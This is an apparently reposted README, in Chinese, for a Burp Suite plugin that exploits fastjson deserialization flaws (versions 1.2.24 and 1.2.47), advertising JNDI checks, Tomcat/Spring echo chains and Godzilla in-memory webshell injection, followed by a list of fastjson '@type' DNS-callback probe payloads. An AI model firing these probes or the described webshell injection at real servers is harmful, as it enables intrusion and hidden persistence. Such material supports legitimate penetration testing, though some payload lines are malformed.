fastjson-exp
2023-3-7 13:6:17 Author: github.com(查看原文) 阅读量:74 收藏

fastjson利用,burp插件。 支持出网 jndi利用检测,不出网 tomcat、spring回显,哥斯拉内存马,回显利用链为dhcp、ibatis、c3p0,内存马支持tomcat89

加载到burp插件,自行选择echo、jndi、inject。 探测存在后,发送Repeater自行修改请求头,回显在响应头。如下 image

image

image

tomcat启动后,将war包放在webapps目录即(tomcat自带dhcp依赖),漏洞环境为1.2.24和1.2.47。

dns ● {"@type":"java.net.Inet4Address","val":"dnslog"}

● {"@type":"java.net.Inet6Address","val":"dnslog"}

● {"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}

● {{"@type":"java.net.URL","val":"http://dnslog"}:0

● {"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}

● Set[{"@type":"java.net.URL","val":"http://dnslog"}]


文章来源: https://github.com/y35uishere/fastjson-exp
如有侵权请联系:admin#unsafe.sh